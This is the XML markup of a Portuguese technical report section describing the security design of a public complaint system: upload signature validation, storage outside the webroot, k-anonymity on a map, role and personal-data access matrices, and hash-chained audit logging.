      <w:r>
        <w:t xml:space="preserve">Extensão e cabeçalho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são escolhidos por quem envia. Um executável renomeado para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">foto.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e declarado como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">image/jpeg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">passa por qualquer validação baseada em nome. A recomendação é validar a assinatura do arquivo contra o formato esperado, e é isso que o código faz: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comeca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conteudo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PNG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comeca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conteudo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JPEG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"image/jpeg"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WebP e um contentor RIFF: "RIFF" nos bytes 0-3 e "WEBP" nos 8-11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comeca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conteudo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RIFF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comeca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conteudo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WEBP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"image/webp"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Vale ser honesto sobre o alcance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">isto não é antivírus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Um JPEG legítimo pode carregar carga maliciosa dirigida a um leitor vulnerável, e a assinatura continuará sendo de JPEG. O que a verificação garante é mais modesto e ainda assim essencial: o que foi aceito como imagem é, de fato, uma imagem, e não um binário esperando ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">O nome do usuário nunca chega ao disco.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O arquivo recebe um UUID sem extensão, seguindo a orientação de gerar o nome do arquivo armazenado, e o nome informado é higienizado e guardado apenas como metadado, para exibição. Travessia de diretório e execução por extensão deixam de ser possíveis não porque foram bloqueadas, mas porque o texto sob controle do usuário nunca alcança o sistema de arquivos. A higienização existe mesmo assim, porque o nome volta para a tela do servidor: um nome com marcação embutida seria armazenado hoje e renderizado amanhã.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">O binário fica fora da pasta pública.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A recomendação é armazenar os arquivos fora do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">webroot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, onde apenas acesso administrativo alcança. Arquivo dentro do diretório servido pelo servidor web é arquivo que qualquer pessoa baixa adivinhando a URL, e evidência de denúncia é o único conteúdo deste sistema que pode conter o rosto da vítima. Gravar os bytes no banco também foi descartado: incharia o backup, atrasaria toda consulta à tabela e transformaria o dump do banco num vazamento completo de uma vez só.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">O hash é reconferido na leitura.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O SHA-256 do conteúdo é gravado no recebimento e recalculado a cada download. Se o arquivo tiver sido trocado no disco por fora da aplicação, a entrega é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">recusada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque devolver como evidência um arquivo que não é mais o recebido seria pior do que não devolver nada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E limites, porque o envio é público: 5 MB por arquivo, 10 por denúncia, 10 requisições por minuto por origem e bloqueio depois que o caso é concluído.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">k-anonimato no mapa.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MIN_EXIBICAO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limiar de privacidade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O mapa agrega por município e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nunca plota o endereço</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Municípios com menos de três denúncias aparecem em cinza neutro. O limiar aplica o modelo de k-anonimato de Sweeney (2002), e a pesquisa posterior mostra que a precaução é modesta, não exagerada: quinze atributos demográficos bastam para tornar únicas 99,98 % das pessoas de um estado americano, e a reidentificação funciona mesmo quando o atacante só dispõe de uma amostra pequena da população (ROCHER; HENDRICKX; DE MONTJOYE, 2019). Sem esse limiar, uma cidade pequena com uma única denúncia permitiria reidentificar a vítima olhando apenas para o mapa, e o dado agregado deixaria de ser agregado.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkStart w:id="113" w:name="registro-de-ações"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2.3 Registro de ações</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O registro de ações é tratado em detalhe na seção 5.4, por ser um item próprio do enunciado. Em resumo, ele se apoia em três decisões: a auditoria é declarativa, por anotação e aspecto (AOP); registra os</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dois desfechos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sucesso e recusa; e cada registro guarda o hash SHA-256 do anterior, formando uma cadeia verificável. A exigência de manter registro das atividades é, ela própria, normativa: a ISO/IEC 27002:2022 dedica ao tema o controle 8.15, Logging (ISO/IEC, 2022), e a ANPD lista a auditoria entre as medidas técnicas esperadas, observando que ela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">registra o que foi feito pelo usuário</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ANPD, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkStart w:id="118" w:name="Xe909e3990899fa08f6cf434b6b666558dbad7db"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Requisito (b): tabelas de perfis, permissões e acesso a dado pessoal</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="115" w:name="X85472c8750fc89071afb51fbef9b7140a7ccc30"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3.1 Matriz de perfis e permissões de operação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63"/>
        <w:gridCol w:w="1035"/>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="913"/>
        <w:gridCol w:w="1035"/>
        <w:gridCol w:w="7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Operação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CIDADÃO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ATENDENTE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GESTOR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Registrar denúncia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por protocolo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Anexar evidência ao próprio protocolo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Listar denúncias do painel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Abrir o detalhe de um caso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Baixar evidência anexada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Alterar status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Atribuir responsável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Editar dados do caso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Atender pela fila e desfazer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Excluir denúncia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Remover evidência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Cadastrar, editar e remover equipe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estatístico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Exportar CSV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 (mascarado)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Consultar a trilha de auditoria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Verificar integridade da cadeia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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:id="116" w:name="matriz-de-acesso-a-dados-pessoais"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3.2 Matriz de acesso a dados pessoais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26"/>
        <w:gridCol w:w="859"/>
        <w:gridCol w:w="1964"/>
        <w:gridCol w:w="1350"/>
        <w:gridCol w:w="859"/>
        <w:gridCol w:w="85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Dado pessoal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CIDADÃO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ATENDENTE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GESTOR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Relato da denúncia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só o próprio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Endereço da ocorrência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só o próprio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[endereço protegido]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Endereço no CSV exportado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 se aplica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[endereço protegido]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 se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 anexado (evidência)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só o próprio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Sim, auditado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Sim, auditado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Sim, auditado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do denunciante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 se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Sim, se não anônima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E-mail do denunciante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 se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mascarado,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">j***a@…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Telefone do denunciante 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 se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mascarado,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">*******4321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Município agregado (mapa)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 se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Identidade de quem operou o sistema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 se aplica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Sim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Sim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">² Modelo físico, não implementação em execução.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">As três linhas marcadas descrevem o comportamento projetado para a tabela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CIDADAO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do modelo Oracle, explicada no Anexo A. A aplicação Java em execução trabalha com um subconjunto desse modelo: ela não tem entidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cidadao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e o único dado identificável que a denúncia carrega hoje é o endereço da ocorrência. Os métodos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MascaraUtil.email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MascaraUtil.telefone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">existem, estão escritos para esses campos e não têm chamador em produção. A seção 5.8 registra a lacuna e o que falta para fechá-la. Descrever aqui um mascaramento que o código ainda não executa seria exatamente o tipo de afirmação não verificável que a introdução deste documento se comprometeu a não fazer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A segunda tabela existe porque o enunciado pede explicitamente quais funcionalidades acessam dados pessoais, e porque a LGPD impõe ao poder público informar as hipóteses em que realiza tratamento de dados pessoais (BRASIL, 2018a, art. 23, I). A identificação de quem denuncia, quando existe, é tratada como informação de acesso restrito, na mesma linha do que determina a Lei 13.460/2017 ao classificar a identificação do requerente como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">informação pessoal protegida com restrição de acesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(BRASIL, 2017, art. 10, §7.º).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkStart w:id="117" w:name="X33e3559ac67ca6bba1c3ef1d95f9226d3762041"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3.3 As duas assimetrias que sustentam o desenho</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O GESTOR não vê a trilha de auditoria.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">É a decisão mais contraintuitiva do sistema e a mais importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quem opera não fiscaliza o próprio uso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Um gestor que pudesse ler e, mesmo sem querer, influenciar o registro das próprias ações tornaria a trilha inútil como prova. A fiscalização pertence a um perfil que não tem poder operacional nenhum.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O AUDITOR não lê o relato.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ele precisa saber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o servidor X abriu o caso 4471 às 14h32, não</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">o que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">estava escrito ali. Dar-lhe acesso ao conteúdo criaria um perfil com visão total do sistema, exatamente o que a segregação existe para impedir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O resultado é que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nenhum perfil, exceto o ADMIN, tem visão completa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. E o ADMIN é o mais auditado de todos.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5" w:name="Xc8162e1b694fc10e6b30602a205f7034211e4fb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Requisito (c): quais operações geram trilha de auditoria</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="119" w:name="o-catálogo-das-ações-auditadas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4.1 O catálogo das ações auditadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quinze endpoints estão anotados com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Auditavel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. As ações</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LOGIN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LOGIN_NEGADO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">são registradas diretamente pelo controlador de autenticação, que roda antes de haver perfil no contexto de segurança. São</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">onze ações auditadas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8"/>
        <w:gridCol w:w="3036"/>
        <w:gridCol w:w="30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Quando dispara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que é auditável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bem-sucedida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Estabelece quem estava operando em cada janela de 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LOGIN_NEGADO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 recusada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Tentativa repetida é sinal de ataque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CONSULTA_SENSIVEL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abertura do detalhe de um caso e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">download de anexo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Leitura é acesso.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Quem leu o relato de quem, e quando. Uma foto anexada a uma denúncia de violência é o dado mais sensível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ALTERACAO_STATUS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mudança de status, inclusive por fila e por desfazer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Muda o andamento do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ALTERACAO_DADOS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edição dos dados do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Alteração de conteúdo precisa de autor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ATRIBUICAO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atribuição de responsável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quem responde pelo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EXCLUSAO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lógica de denúncia e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">remoção de anexo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operação mais destrutiva do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EXPORTACAO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/api/exportacao/denuncias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Dado que sai do sistema deixa de ser controlável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REANALISE_IA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reanálise pelo VigIA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automatizada precisa de rastro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ALTERACAO_EQUIPE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cadastro, edição e remoção de membro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Altera quem pode receber casos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ACESSO_AUDITORIA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à própria trilha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Quem vigia o vigia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A lista não é arbitrária. A OWASP recomenda registrar, no mínimo, sucessos e falhas de autenticação, falhas de autorização e falhas de validação de entrada (OWASP, [s.d.]b), e as quatro operações que o enunciado cita nominalmente estão contempladas. O último item da tabela é o menos óbvio e o mais necessário: se consultar a auditoria não gerasse registro, o perfil AUDITOR teria uma zona cega, e poderia varrer a atividade de todo mundo sem deixar rastro da própria varredura.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="120" w:name="o-que-não-é-auditado-e-por-quê"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4.2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é auditado, e por quê</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/stats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GET /api/stats/analitico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">não geram trilha. A resposta é integralmente agregada e nenhum campo permite chegar a um caso individual. Auditar leitura de agregado encheria a trilha de ruído e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dificultaria encontrar os acessos que importam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: uma trilha em que tudo aparece é uma trilha em que nada se destaca.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A listagem paginada (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/denuncias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) também não gera trilha, e pela mesma razão só é defensável porque o DTO de listagem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não carrega relato nem endereço</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se carregasse, a decisão estaria errada.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkStart w:id="121" w:name="registro-nos-dois-desfechos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4.3 Registro nos dois desfechos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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retorno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proceed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auditoria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recurso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PERMITIDO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detalhe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retorno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AccessDeniedException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auditoria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recurso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NEGADO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"Acesso negado pelo perfil"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auditoria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registrar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acao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recurso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Um sistema que só registra o que deu certo não serve para investigar abuso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A tentativa recusada é justamente a informação de segurança mais valiosa, porque é ela que mostra alguém sondando o que não deveria, e por isso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Authorization (access control) failures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aparece explicitamente entre os eventos que a OWASP manda registrar (OWASP, [s.d.]b).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O interceptador é um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">aspecto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(AOP). A alternativa seria chamar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditoria.registrar(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro de cada método, o que espalharia a preocupação de auditoria pelos nove controladores e tornaria fácil esquecer um. Com a anotação, auditar é declarativo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@Auditavel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acao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AuditoriaService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CONSULTA_SENSIVEL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recurso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"Denuncia"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)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"/{id}"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DenunciaDetalheResponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">detalhar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@PathVariable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bookmarkEnd w:id="121"/>
    <w:bookmarkStart w:id="122" w:name="X8ae0d1649a26777c878aaa19eae0a0206156739"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4.4 A recusa que acontecia antes do controlador</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Havia uma lacuna real nesse desenho, encontrada em teste e corrigida nesta fase. A anotação</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Auditavel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">envolve o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">método do controlador</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando o Spring Security recusa a requisição por regra de rota, o método nunca executa, e portanto nada era registrado. As recusas mais interessantes, as bloqueadas por rota, eram justamente as que não deixavam rastro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A correção foi levar a auditoria para o ponto onde o 403 é efetivamente emitido, no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RespostasDeSeguranca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que passou a receber o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AuditoriaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e a mapear a URI recusada para a ação correspondente antes de responder. O registro da recusa é feito em bloco protegido, com uma justificativa que ficou no código: auditar é importante, negar o acesso é mais. Se o registro falhar, a requisição continua sendo recusada.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="123" w:name="X6067a9462e450f1f5fbbc31ff9d88d4b1efc49c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4.5 O que cada registro guarda, e a cadeia de hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Campos gravados:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dataHora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acao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recurso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">recursoId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origemIp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detalhe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
